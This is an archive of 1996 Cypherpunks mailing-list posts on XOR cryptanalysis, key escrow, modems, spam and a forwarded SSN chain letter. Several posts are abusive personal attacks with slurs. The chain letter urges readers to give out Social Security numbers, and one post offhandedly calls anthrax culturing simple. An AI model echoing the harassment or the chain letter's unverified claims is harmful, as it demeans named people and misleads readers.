Yeah, this is still a form of brute force but I was thinking of this in terms of a smallish (sub 200 bit) key, so brute force against solutions with 0 entropy is a realistic possibility. Anyone else got a faster way to attack this highly theoretical, will-never-be-implemented, type system?? I`d imagine there is some sort of way to measure the entropy "mixed in" by the XOR thus giving a foothold in the key, but I can`t think of anything right now, anyone got any ideas?
Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From enzo at ima.com Wed Sep 18 05:13:14 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Wed, 18 Sep 1996 20:13:14 +0800 Subject: Wealth Tax vs. Capital Gains Tax Reduction In-Reply-To: <323F13CA.7523@netscape.com> Message-ID: Such kind of wealth tax would likely trigger a major sell-off of stocks, both because holding them would no longer defer taxation, and also for raising the liquidity necessary to pay the tax. That could potentially cause a stockmarket crash, and upset a lot of electors. I hope that U.S. Congress and government be aware of that. Enzo On Tue, 17 Sep 1996, Thomas Dell wrote: > > Needless to say, I despise the idea of a "wealth tax," and I can > > see various loopholes and workarounds. I'd also expect a lot of > > folks to simply move out of the country if this were to happen. > > Not without difficulty.
While this is not from a reliable source, > it does seem that the gov't is aware of this issue. > > Tom > > tdell at netscape.com [...] From gbroiles at netbox.com Wed Sep 18 06:26:30 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Wed, 18 Sep 1996 21:26:30 +0800 Subject: Eudora 3.0 supports multiple tentacles Message-ID: <3.0b19.32.19960918034112.006e3598@pop.ricochet.net> Those of you who have or are tentacles (hee, hee) might take a look at the new Eudora 3.0 beta; it's got nice built-in support for multiple POP mailboxes/usernames, and keeps track of which identity received a messages, and sends replies from that identity (using the appropriate outbound SMTP server) so as not to confuse correspondents. It seems to be ideally set up for people who want to adopt an alternate nym for whatever reason. The filtering is also allegedly improved but I haven't fussed with that much yet. -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From gbroiles at netbox.com Wed Sep 18 07:14:48 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Wed, 18 Sep 1996 22:14:48 +0800 Subject: The GAK Momentum is Building... Message-ID: <3.0b19.32.19960918032950.007163ac@pop.ricochet.net> >>However, making the government a _required_ part of such plans implies a >>motive that is not at all the same as what companies wish (mostly, >>disaster recovery). > >the distinction lies in the terminology. what does it mean, "required >part of the plan". if it essentially amounts to nothing more than >the government saying, "you must give us keys when we present you >with a subpoena/warrant", then that's no different than the system >we have today. Hmm. The government sure is putting a lot of effort into moving us to a system that you say is "no different than the system we have today." As far as I can tell, you're the only one who thinks that. 
The government thinks that GAK is a big change, civil libertarians think GAK is a big change .. but you're welcome to call it "status quo" if it suits you. There's a world of difference between the government subpoena-ing something from me, where I can delay disclosure until I've exhausted my legal avenues to challenge disclosure, and the government demanding data from an at best disinterested third party who cares not at all if I get my day in court before they disclose. With the second scenario, I'm forced to try to "unring the bell", and somehow limit the spread of otherwise private/confidential data in a community (law enforcement) which is organized to collect and retain information. Ha, ha. Given today's Congress and Supreme Court, there's probably precious little chance that keys disclosed prematurely or erroneously won't be used to collect evidence which will be admissible despite the lack of meaningful opportunity to challenge the "recovery" of a key. -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From gary at systemics.com Wed Sep 18 08:36:55 1996 From: gary at systemics.com (Gary Howland) Date: Wed, 18 Sep 1996 23:36:55 +0800 Subject: SSN database scam? Message-ID: <323FDB5E.500F9F30@systemics.com> Forwarded from www-security mailing list. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 To: www-security at ns2.rutgers.edu Subject: Can you say "fraud"? (fwd) From: Mary Irene Wise Date: Tue, 17 Sep 1996 08:44:39 -0400 (EDT) Sender: owner-www-security at ns2.rutgers.edu This is probably a bit off-topic; if so I apologize. Can anybody comment on the item forwarded below my sig file? 
It claims there's a database w/ people's credit card no's etc on it and you have to give your name and social security number to get off of it. This strikes me as being a scam to get your ssn, but this went around at work and people are actually calling and giving it out. I know ssn's aren't really as secure as they're supposed to be, but still... So, does anybody know if this database is for real or if it's just a scam? TIA, Mary Wise --------------------------------- *** ------------------------------------ Mary Wise | Computer Systems Specialist * auntyem at umich.edu LSA Information Technology | homepage not availabe at this time 3557 LSA Bldg 1382 * University of Michigan | (313) 647-6230 * | --------------------------------- *** ------------------------------------ ---------- Forwarded message ---------- > > > Your name, social security number, current address, previous addresses, > mother's maiden name, birth date and other personal information > are now available to anyone with a credit card through a new Lexis database > called P-Trax. As I am sure you are aware, this information > could be used to commit credit card fraud or otherwise allow someone else to > use your identity. > > You can have your name and information removed from this list by making a > telephone request. Call (800)543-6862, select option 4 and > then option 3 ("all other questions") and tell the representative answering > that you wish to remove your name from the P-trax database. You > may also send a fax to (513) 865-7360 or 865-1930. Include your full name and >ssn in the fax. You can also send physical mail to > > LEXIS-NEXIS > P.O. Box 933 > Dayton, Ohio 45401-0933. > > Sending physical mail to confirm your name has been removed is always > a good idea. > > As word of the existence of this database has spread on the net, Lexis-Nexis > has been inundated with calls, and has set up a special set of > operators to handle the volume. 
In addition, Andrew Bleh (rhymes with > "Play") is a manager responsible for this product, and is the person > to whom complaints about the service could be directed. He can be reached at > the above 800 number. Ask for extension 3385. According to > Lexis, the manager responsible is Bill Fister at extension 1364. > > I called this morning and had my name removed. The representative will > need your name and social security number to remove you from the list. > I suggest that we inundate these people with requests to remove our > info from the list and forward this e-mail to everyone we know. > > >----- End Included Message ----- > > > >Cheers . . . > >"The backup procedure works fine, but the restore is tricky!" >_____________________________________________________________________________ > | _ \ Amanul Haque > | | \ \ Pencom System Administration > | |_/__/__ __ 9050 Capital of Texas Highway North, Austin, TX 78759 > | _/ ___/| \ Email: ahaque at pencom.com > | | \___ \| \ \ Pager: (708) 643-7331 > |__| /____/|_|__\___________________________________________________________ > Pencom Web Page : http://www.pencom.com > > > >------------- End Forwarded Message ------------- > > > > > -=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- Nancy L. Cassidy University of Michigan LS&A Budget & Finance Team 2557 LSA Bldg. 1382 Tel: (313) 764-6465 Fax: (313) 764-2697 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From dlv at bwalk.dm.com Wed Sep 18 08:47:12 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 23:47:12 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: Message-ID: tcmay at got.net (Timmy May) (fart) writes: > * Detweiler (vznuri at netcom.com) writes: Detweiler is much smarter than VZNuri (or Timmy). I don't think Timmy believes his own lies. > (Sadly, a large fraction of the women who have posted on our list have > written in this same kind of incoherent, rambling, makes-no-sense kind of > style. 
I have no idea why the percentage of such events is so high.) Is Timmy gay? Why does he hate women so much? > * And of course Vulis has been posting his "farting" messages far and wide. Recently, 3 people in the computer security field have independently told me that Timmy May approached them "off-list" to complain about things I supposedly say on the Internet - most of which I never said. When I asked about it on this mailing list, Timmy posted what was shown to be a lie (about his complaint to Kelly Goen.) Timmy is known as a nutcase and a liar - if he keeps up his "character assassination" attacks, the only reputation he hurts is his own. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From DMiskell at envirolink.org Wed Sep 18 09:12:15 1996 From: DMiskell at envirolink.org (Daniel Christopher Miskell) Date: Thu, 19 Sep 1996 00:12:15 +0800 Subject: A daily warning regarding Timothy C. May Message-ID: >Timothy C. May is a lying sack of shit. Right. And you had to insult him through use of anonymous mail. Boy, you're real brave, shedding the light to the rest of the cypherworld in such a manner. Apologies for the spam, but there was no address, obviously. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From nobody at cypherpunks.ca Wed Sep 18 09:35:05 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Thu, 19 Sep 1996 00:35:05 +0800 Subject: The daily warning about Timmy May, the lying sack of shit Message-ID: <199609181221.FAA30299@abraham.cs.berkeley.edu> Timmy May proves that the Midwestern gene pool needs some chlorine in it. From declan at eff.org Wed Sep 18 09:44:50 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 19 Sep 1996 00:44:50 +0800 Subject: The GAK Momentum is Building... 
In-Reply-To: Message-ID: On Tue, 17 Sep 1996, Timothy C. May wrote: > > (BTW, I predict that the tainted term "key escrow" is now gone from the > official lexicon. I haven't seen the Clipper IV proposal, but I surmise > that the baggage the term "key escrow" carries means that some more > benign-sounding term will be used in the final proposal. Something like > "Key Recovery System." You heard it here.) I agree, of course. But Gore's office has been telling me about the "Key Recovery System" for months. It's nothing new in the DC cryptolexicon. -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // From pjb at ny.ubs.com Wed Sep 18 09:46:25 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Thu, 19 Sep 1996 00:46:25 +0800 Subject: 56 kbps modems Message-ID: <199609181248.IAA06860@sherry.ny.ubs.com> if nothing else, the availability of 56kbps on an analog line might get the telcos to bring the isdn prices down to some reasonable level, which at the moment, it is not, at least not in nyc. -paul > From cypherpunks-errors at toad.com Tue Sep 17 18:21:03 1996 > From: Adamsc at io-online.com (Adamsc) > To: "Bill Stewart" , > "cypherpunks at toad.com" > Cc: "Asgaard" , "Enzo Michelangeli" > Date: Tue, 17 Sep 96 12:22:15 -0800 > Reply-To: "Chris Adams" > Priority: Normal > X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2 > Mime-Version: 1.0 > Content-Type> : > text/plain> ; > charset="us-ascii"> > Content-Transfer-Encoding: 7bit > Subject: Re: 56 kbps modems > Sender: owner-cypherpunks at toad.com > Content-Length: 1107 > > On Sun, 15 Sep 1996 01:31:19 -0700, Bill Stewart wrote: > > >and still get the original 56kbps back out. But if they can, well, > >yee-hah, ISDN is nearly dead :-) (Not totally dead; the signalling is > >still useful for some applications, the convenience of two channels on > >one wire pair is nice, and the fact that people can get 56kbps without > Also, can't you add ISDN b-channels ? (I.e. 
get another 64kps channel) > >the phone company's help will pressure them into offering ISDN for > >a lower price in areas where the Phone Company's idea of "all the market > >will bear" is substantially higher than voice pricing.) > > ISDN is more elegant; this sounds like a 'kludge' of sorts. OTOH, we've all > seen how well a cheap kludge can do, right? > > # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp > # cadams at acucobol.com | V.M. (619)515-4894 > "I have never been able to figure out why anyone would want to play games on > a computer in any case when the whole system is a game. Word processing, > spreadsheets, telecoms -- it's all a game. And they pay you to play it." > -- Duncan Frissell > > > From liberty at gate.net Wed Sep 18 09:55:10 1996 From: liberty at gate.net (Jim Ray) Date: Thu, 19 Sep 1996 00:55:10 +0800 Subject: The GAK Momentum is Building... Message-ID: <199609181251.IAA118254@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Wed Sep 18 08:48:43 1996 Tim May wrote: <...> > (BTW, I predict that the tainted term "key escrow" is now gone from the > official lexicon. I haven't seen the Clipper IV proposal, but I surmise > that the baggage the term "key escrow" carries means that some more > benign-sounding term will be used in the final proposal. Something like > "Key Recovery System." You heard it here.) I agree, and hope so. "Key Recovery," while not as Orwellian-sounding as "GAK," is a step on the path to honesty WRT the English language, though it's important to continually point out, as Tim did in his post, that *access* -- rather than just recovery -- is obviously what Mr. Freeh wants. I'd count this likely change in terminology as a "cypherpunk victory," albeit a very small and certainly a very hard-fought one. 
JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMj/vsG1lp8bpvW01AQFkhwP/XEkJkdXwYsdSM8kn+B3bR/bCDXaKgkIE p63RgjQ5C60byufXqlqitvuJPMuS19MRxlF7UXsXJXKY6Jm92Q45sQtLICsMqXhP /iJwDVYaEuDj24cFycsZjZMeT+xxnuy+OCuhKIEgKF6gjh2uEZxbCellCqJ86TPF XfPiQiTPBDo= =B2hR -----END PGP SIGNATURE----- From roy at sendai.scytale.com Wed Sep 18 09:55:35 1996 From: roy at sendai.scytale.com (Roy M. Silvernail) Date: Thu, 19 Sep 1996 00:55:35 +0800 Subject: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ] In-Reply-To: Message-ID: <960918.071638.9e0.rnr.w165w@sendai.scytale.com> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, tcmay at got.net writes: > > At 9:14 PM 9/17/96, Mike Fletcher wrote: > >> The Frank Herbert (of _Dune_ fame) book _White Plague_ comes >>to mind. Basically a molecluar biologist's wife and kids are killed >>by an IRA bomb while visiting Dublin. He snaps and creates a plague >>which kills women (men are carriers) as revenge. All without using >>that nasty Internet (in fact, the book was written back before even >>ARPAnet). > > A _very_ minor correction. My copy of "The White Plague" is not handy, but > I distinctly recall reading it circa 1980-1, certainly no earlier than > 1977-8. Right you are, Tim. From the Minneapolis Public Library online catalog: | AUTHOR: Herbert, Frank. | TITLE: The white plague / Frank Herbert. 
| EDITION: 1st ed. | IMPRINT: New York : Putnam, 1982. | CALL NO.: SCIENCE FICTION | PHYSICAL FEATURES: 445 p. ; 24 cm. | LC CARD NO.: 82-7586 | ISBN/ISSN: 0399127216 : | OCLC NO.: 08432222 > But of course I agree that "The White Plague" was written long before "The > Net" became a household name. (Interestingly, Herbert was > computer-literate, and he even wrote a book about using PCs, circa the late > 70s....something like "Nailing Jelly to a Tree.") As long as I'm skulking about the library.... AUTHOR: Herbert, Frank. TITLE: Without me you're nothing : the essential guide to home computers / Frank Herbert, with Max Barnard. IMPRINT: New York : Simon and Schuster, c1980. CALL NO.: QA76.5.H46 PHYSICAL FEATURES: 304 p. : ill. ; 25 cm. OTHER AUTHORS: Barnard, Max, SUBJECTS: Microcomputers. * Minicomputers. LC CARD NO.: 80-22315 ISBN/ISSN: 0671412876 OCLC NO.: 06761235 - -- Roy M. Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMj/pYxvikii9febJAQG4oAP/dJCJ5VO6w3fed5S3XgcyY2phm00G1uFg PkOdWTMf3Qsom6tciXOrJ9XNv5YStpXq7FFoz0jcHpbicpK6kMvevbrctinLu3GN M576EomA1iC3RPqn4Pw5D0kuv0JP9sU/egvIw2oOR7auul0Hdl1tZ8qoeejnIdRv XpfOyrxC6vk= =OlkL -----END PGP SIGNATURE----- From schmidt at pin.de Wed Sep 18 10:07:41 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Thu, 19 Sep 1996 01:07:41 +0800 Subject: SPAMS Message-ID: Hi, please focus on the UPPER written text at the bottom. I think they take it _much_ to easy. -stephan ---------- Forwarded message ---------- Date: Sun, 15 Sep 1996 17:55:57 +0000 From: Mailer To: LISCIFI at AOL.COM Subject: Hi! Pardon the intrusion. Market study shows this may be of interest to you. If you have received this message in error, please hit delete. *********************************************************** A Personal Invitation Stop working for someone else! 
Put yourself in a position to leave the 9-5 grind behind!!! We invite you to listen to the most extraordinary and most powerful wealth building opportunity in the world and within a few minutes you will actually hear: * How you can make profits of $10,000 within the next 30 days! * You never have to leave your home! * A financial strategy 100 times more powerful than MLM or ANY OTHER BUSINESS! * Where you are paid directly and daily! (Don't wait for a company to pay you!) This is not MLM! This is not a pipe dream! This is a real business venture! 800-995-0796 Ext 9263. ************************************************************** ANY EMAIL ADDRESS PUBLISHED ON THE INTERNET THAT INVITES COMMERCIAL SOLICITATIONS IS DEEMED AS A COMMERCIAL ADDRESS, AND AS SUCH IS ELIGABLE FOR ETHICAL AND LEGAL EMAIL SOLICITATIONS FROM DIRECT ELECTRONIC MAIL MARKETERS. IF FOR ANY REASON YOU OBJECT TO RECEIVING THIS MESSAGE PLEASE POLITELY REQUEST REMOVAL FROM MY LIST BY CLICKING ON THE REPLY BUTTON AND ENTERING "REMOVE" IN THE SUBJECT LINE. IF YOU DO NOT DO SO, I MUST ASSUME YOU WISH TO RECEIVE FURTHER MAILINGS. From wb8foz at nrk.com Wed Sep 18 10:09:21 1996 From: wb8foz at nrk.com (David Lesher) Date: Thu, 19 Sep 1996 01:09:21 +0800 Subject: PGP in the workplace In-Reply-To: Message-ID: <199609181244.IAA26798@nrk.com> > At 3:20 AM 9/18/96, Rick Osborne wrote: > >Upon explaining to them that I was simply trying to make sure of my own >security....... I agree, send this to Scott Adams. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From declan at eff.org Wed Sep 18 10:27:56 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 19 Sep 1996 01:27:56 +0800 Subject: The GAK Momentum is Building... 
In-Reply-To: <199609180338.UAA27100@netcom15.netcom.com> Message-ID: On Tue, 17 Sep 1996, Vladimir Z. Nuri wrote: > [business key management plans/infrastructures] > >However, making the government a _required_ part of such plans implies a > >motive that is not at all the same as what companies wish (mostly, disaster > >recovery). > > the distinction lies in the terminology. what does it mean, "required > part of the plan". if it essentially amounts to nothing more than > the government saying, "you must give us keys when we present you > with a subpoena/warrant", then that's no different than the system > we have today. again, granted, laws specifically aimed at crypto > can tend to take up a life off their own. but my main point was > that the gloom-and-doom peddled by you and lucky green over clipper > just doesn't mesh with the actual events. the government has > visibly had to *backpeddle* *numerous* times in all of its > clipper proposals. I see no evidence that the latest proposals > are going to be any different. what annoys me is people who are > crying wolf all the time, and even when it seems there are no > wolves around, or they have temporarily receded, > they say, "I told you so". "the wolves really are going to > devour you, just you wait and see" Perhaps I'm missing something here. If a key recovery infrastructure is required, let it develop free of government coercion and intervention. Let the free market develop it. If the KRI is indeed free, the Feds won't have any problems with us escrowing keys in Switzerland or Belize, will they? The White House is not backpedaling as much as trying other attacks. Like having Clinton call wavering Democratic senators on Senate Commerce and reminding them of their political obligations to him in an election year. And like the government-mandated key recovery infrastructure. The fight is anything but over. 
-Declan // declan at eff.org // I do not represent the EFF // declan at well.com // From adam at homeport.org Wed Sep 18 10:56:40 1996 From: adam at homeport.org (Adam Shostack) Date: Thu, 19 Sep 1996 01:56:40 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: <199609181448.JAA01172@homeport.org> Lucky Green wrote: | On Wed, 18 Sep 1996, Steve Schear wrote: | > It seems that in order for this to work Net consumers must be | > convinced/coerced into accepting the GAK security features. What if, due | > to a grassroots uprising, Neters refuse to use products which require GAK | > or Net services which will only operate via GAK? Isn't there an great | > opportunity being created for S/Wan, Apache and its ilk and third-party | > (especially off-shore, non-COCOM, produced) security plug-ins? | | Simple. Incentivize sites/server/payment system manufacturers to require | certs from their users. This is already underway. See SET. Then make sure | that the certs/keys are GAK'ed. Yes, I know there is a difference between | certs and keys. Joe User doesn't. Neither does the media. It is a two step | process. The problem with GAK in financial systems is that it makes your non-repudiation repudiable. It also opens you to the CIA using your bank to finance a revolution in Central America. Think of it as a revolutionary tax. ;) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jbugden at smtplink.alis.ca Wed Sep 18 11:12:48 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Thu, 19 Sep 1996 02:12:48 +0800 Subject: Cognitive Bias and Software Development Message-ID: <9608188430.AA843065026@smtplink.alis.ca> This reference was chopped from the bottom of a previous message. Communications of the ACM issue on Cognition and Software Development "Developers' thought processes are a fundamental area of concern. 
Cognitive scientists have discovered that people's intuitive inferences and probability judgments do not strictly conform to the laws of logic or mathematics, and that people are willing to provide plausible explanations for random events. This article examines the role these phenomenon might have in software development, ultimately concluding that what are cast as one-sided software development guidelines can be recast beneficially as two-sided trade-offs" Cognitive Bias in Software Engineering Webb Stacy and Jean MacMillian Communications of the ACM June 1995/Vol 38, No. 6 The article contains several good examples of various classes of bias, including the representativeness, availability and confirmatory bias. While the article specifically addresses issues within the context of software development, all of these biases are general in nature and have correlates in other fields. Ciao, James Great minds think alike. Fools seldom differ. - Anonymous From cmefford at avwashington.com Wed Sep 18 12:10:23 1996 From: cmefford at avwashington.com (Chip Mefford) Date: Thu, 19 Sep 1996 03:10:23 +0800 Subject: cypherpunk listserve usefulness Message-ID: As much as it shames me, I have recently discovered that by filtering messages from only 2 participants and setting body filters on 3 keywords has remarkably improved the usefulness of this listserve. As much as I do enjoy some of the filtered subject matter, I really feel it is very off subject and makes this listserver useless for the intended task. I guess that makes me a censor and it has me reexamining some things. From varange at crl.com Wed Sep 18 13:07:37 1996 From: varange at crl.com (Troy Varange) Date: Thu, 19 Sep 1996 04:07:37 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: Message-ID: <199609181415.AA21481@crl11.crl.com> > tcmay at got.net (Timmy May) (fart) writes: > > * Detweiler (vznuri at netcom.com) writes: > > Detweiler is much smarter than VZNuri (or Timmy).
I don't think Timmy > believes his own lies. > > > (Sadly, a large fraction of the women who have posted on our list have > > written in this same kind of incoherent, rambling, makes-no-sense kind of > > style. I have no idea why the percentage of such events is so high.) > > Is Timmy gay? Why does he hate women so much? > > > * And of course Vulis has been posting his "farting" messages far and wide. > > Recently, 3 people in the computer security field have independently > told me that Timmy May approached them "off-list" to complain about > things I supposedly say on the Internet - most of which I never said. > When I asked about it on this mailing list, Timmy posted what was shown > to be a lie (about his complaint to Kelly Goen.) Timmy is known as a > nutcase and a liar - if he keeps up his "character assassination" > attacks, the only reputation he hurts is his own. > > Dr.Dimitri Vulis KOTM Fuckhead. From frantz at netcom.com Wed Sep 18 13:20:17 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 19 Sep 1996 04:20:17 +0800 Subject: Fear of Flying -- from HotWired Message-ID: <199609181446.HAA10952@netcom8.netcom.com> At 1:21 AM 9/18/96 -0400, Black Unicorn wrote: >> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote: >> >Gee, biotech has come a long way. Now I can download the Anthrax DNA >> >sequence from the net and insert it in some carrier bacteria and start >> >making Anthrax bacteria. Neat! > >Culturing and growing anthrax is painfully simple. No DNA required. Sorry Unicorn, you missed my point. (1) You need DNA to grow bacteria. You can get the DNA two ways. (A) You get a sample of the beast, or (B) You get a DNA sequence and then regenerate the DNA. (I don't think B is technically feasable yet.) (2) You can't send samples of the beast thru the net. ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." 
| 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From frissell at panix.com Wed Sep 18 13:23:03 1996 From: frissell at panix.com (Duncan Frissell) Date: Thu, 19 Sep 1996 04:23:03 +0800 Subject: Spam blacklist project Message-ID: <3.0b19.32.19960918112541.00a0bc48@panix.com> hallam at ai.mit.edu writes: > Well if some people find it amazing that there are people out there > who agree with the 98.8% of people who did not vote Libertarian at the > last election then so be it. Course half the eligible population didn't vote at all obviously favoring market and personal approaches over political methods of governance. DCF From shamrock at netcom.com Wed Sep 18 13:28:37 1996 From: shamrock at netcom.com (Lucky Green) Date: Thu, 19 Sep 1996 04:28:37 +0800 Subject: The GAK Momentum is Building... In-Reply-To: <199609181251.IAA118254@osceola.gate.net> Message-ID: On Wed, 18 Sep 1996, Jim Ray wrote: > I agree, and hope so. "Key Recovery," while not as Orwellian-sounding as > "GAK," is a step on the path to honesty WRT the English language, though > it's important to continually point out, as Tim did in his post, that > *access* -- rather than just recovery -- is obviously what Mr. Freeh wants. > > I'd count this likely change in terminology as a "cypherpunk victory," > albeit a very small and certainly a very hard-fought one. Nope. It is a Cypherpunk loss. The use of the term "key recovery" for GAK now fully obfuscates the distinction between accessing a backup copy by the legitimate owner (or his estate, employer, etc.) and GAK. Many PKIs will support the former type of key recovery. And for good reasons. Thanks to the brainwashers using the same term for GAK, it will now become impossible to tell from a basic description of a PKI if it supports GAK or not. 
Furthermore, those who oppose the latter type of key recovery (us!), will be pushed further into the fringe by the media now being able to mix up our arguments against GAK with arguing against true key recovery. [Do you notice the weird constructs I have to use to distinguish the two meanings? One of them being new...] --Lucky From sandfort at crl.com Wed Sep 18 13:31:10 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 19 Sep 1996 04:31:10 +0800 Subject: A daily warning regarding Timothy C. May In-Reply-To: <199609180341.FAA02454@basement.replay.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Wed, 18 Sep 1996, Anonymous wrote: > Timothy C. May is a lying sack of shit. I've never known Tim to lie. As to the rest, Tim has always been above reproach in his personal hygiene. There is a smell here, but it comes from anonymous who is obviously a sad, pathetic loser. Back under your rock, anonymous. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From geeman at best.com Wed Sep 18 13:53:26 1996 From: geeman at best.com (geeman at best.com) Date: Thu, 19 Sep 1996 04:53:26 +0800 Subject: Redundancy in XOR encryption Message-ID: <01BBA53A.2B7FC2A0@geeman.vip.best.com> in any practical or semi-practical application, you'll have to have a way to decompress the perfectly compressed data. A dictionary? A Huffman-tree-ish sort of thing? Are you going to transfer it out-of-band? **It** becomes the target of interest. ---------- From: paul at fatmans.demon.co.uk[SMTP:paul at fatmans.demon.co.uk] Sent: Tuesday, September 17, 1996 12:33 PM To: cypherpunks at toad.com Subject: Re: Redundancy in XOR encryption > > > > Compress P to get perfect compression (ie. 
0 redundancy) > > Encrypt F (the compressed text) using a repeated key XOR > > > > of course this is all rather theoretical as there is no such thing as > > perfect compression, but I just thought it might be interesting to > > see if this is indeed strong, superficially it appears so to me... > > > > Paul: > I think that if the cryptanalyst knows that F has zero redundancy > that he can run searches from 0 to n bits for the key and have > the computer flag solutions that have zero redundancy. I never though of that. > I also think that a perfectly compressed file would have a relative > entropy value close to one also, hence the computer could flag possibles > that have both characteristics. yeah, these two are reasonably unlikely to occur together (only a reasoned guess, anyone got any comments on this?) so we really have a weakish system. > Hence, instead of searching for plaintext by counting coincidences, > we are searching the decrypts for solutions that have zero redundancy > and a relative entropy value close to one. How many solutions will > have both these qualities? I don't know. But if the compression method > is known, brute force will be tried, and only having to try to > decompress (read) data that has the resultant characteristics > of compressed information will speed things up by quite a bit. Yeah, this is still a form of brute force but I was thinking of this in terms of a smallish (sub 200 bit) key, so brute force against solutions with 0 entropy is a realistic possibility. From wendigo at pobox.com Wed Sep 18 13:59:13 1996 From: wendigo at pobox.com (Mark Rogaski) Date: Thu, 19 Sep 1996 04:59:13 +0800 Subject: Snake-Oil FAQ In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu> Message-ID: <199609181500.LAA08399@charon.gti.net> -----BEGIN PGP SIGNED MESSAGE----- An entity claiming to be Krenn wrote: : : It would be nice to have a list of actual products which are deemed : potential snake-oil. 
Such a list could be maintained anonymously : through a nym to avoid all the annoying legal problems with commenting : on another's product. Though truth is the best defense against libel : charges, it would be very annoying to be sued or some such by some : hairbrained snake-oil peddler. : I think a blacklist of that sort is inherently bad. I would much rather have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than just be spoon fed a list of good products vs. bad products. Pardon the cliche, but if you give a man a fish ... etc, etc. mark - -- Mark Rogaski | Why read when you can just sit and | Member GTI System Admin | stare at things? | Programmers Local wendigo at gti.net | Any expressed opinions are my own | # 0xfffe wendigo at pobox.com | unless they can get me in trouble. | APL-CPIO From jbugden at smtplink.alis.ca Wed Sep 18 14:02:23 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Thu, 19 Sep 1996 05:02:23 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <9608188430.AA843068299@smtplink.alis.ca> snow wrote: > Actually, don't some wealthy Canucks come south of the border for > certain treatments unavailable in the Great White North? Yes, some wealthy (and not so wealthy people) go south of the border for treatment. Some go because the treatment is unavailable here, others go if they chose not to wait for treatment here.
The most common types of exported services are usually high cost and/or experimental but their availability is most often constrained by the low number of people who are qualified to render the service. Many services unavailable in a patient's local area are still covered by provincial health plans. This works when a patient has to travel from a remote region, to another province or to the U.S., and can cover experimental treatments. Some Canadian hospitals make use of U.S. care providers for services when a backlog exists in Canada. For example, Windsor has used Detroit MRI services to reduce waiting times. There are also people who go the other way (U.S. to Canada), usually when they have to pay their own bill. Detroit to Windsor is again not uncommon. > Are the PRICES as high in Canada as here? In general, prices are lower in Canada for the same level of care. I do not know if the underlying costs are also lower in general. Each province creates a payment schedule for services that it reimburses. Hospitals bill the province for services, but all capital cost items (e.g. equipment, buildings) must be paid for from other sources (e.g. donation). Thus, we tend to have fewer capital intensive treatment facilities since the ROI is usually low. The figures that I have seen indicate that the U.S. pays 40%-50% more than Canada on 